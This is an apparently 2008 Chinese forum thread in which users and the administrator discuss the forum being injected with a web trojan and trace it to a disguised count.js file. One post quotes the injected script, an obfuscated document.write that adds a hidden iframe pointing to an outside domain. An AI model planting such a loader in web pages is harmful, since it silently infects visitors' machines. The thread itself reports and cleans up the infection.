haowen 2008-1-14 10:49
网站有毒(已解决)
管理员跑哪里去了?
<script src="include/javascript/msn.js" type="text/javascript"></script>
<script src="relatethread.php?tid=69389&subjectenc=%CC%DA%D1%B6%D3%D6%C7%E3%C7%E9%B7%EE%CF%D7%C1%CB%A3%AC%D0%C7%BF%D5%B4%F3%D7%AA%C5%CC%A3%AC%CC%D8%B5%C8%BD%B1%BF%C9%CA%C7ipod%20touch%CA%D6%BB%FA%C5%B6%A1%AB%A1%AB&tagsenc=&verifykey=98e271f34fc50bb4a300899bd9a9f31b&up=0" type="text/javascript"></script>
lmb 2008-1-17 04:24
实在抱歉,删掉又会出来,怀疑是服务器上面有问题,或者是被人装了后门,请大家尽量用FIREFOX来浏览。
haowen 2008-1-18 15:04
服了,还没有解决!
<script>
<!--
document.write(unescape("%3Ciframe%20src%3Dhttp%3A//www.uhbaidu.com/photo/huoji.htm%3F-10%20width%3D1%20height%3D0%3E%3C/iframe%3E"));
//-->
</script>
ly5360 2008-1-21 19:52
已经找到网站被挂的网马了。
名称:鹤城青华
网址:[url]http://www.love0452.com/[/url]
挂马情况:页面接近底部部分,被植入JS代码。
<script src="/count.js" type="text/javascript"></script>伪装统计代码的JS。。
分别利用REAL漏洞,和联众 漏洞。。。
详细分析请见:
鹤城青华综合论坛被植入JS网马,并下载机器狗。 - 死性不改's Blog~
[url]http://www.clxp.net.cn/article.asp?id=748[/url]
lmb 2008-1-30 17:44
首先要感谢 ly5360 的帮助,
我已经把这个COUNT.JS删除了,在此我要向各位支持的朋友们道歉,年底我实在很忙,没有时间打理论坛,遭人挂马,现在还不确定是程序上出了问题还是服务器那边的问题,DISCUZ我用了几年了,一直没出什么大问题,我也没有使用其他的插件之类,担心论坛被装了后门,请大家一定小心,尽量打全补丁,realplayer和迅雷联众暴风影音和PPS都换成最新版本的,可能的话去下个FIREFOX,用这个可以避免通过网页中毒
[url=http://firefox-xiazai-download.cn/]FIREFOX 2.0下载[/url]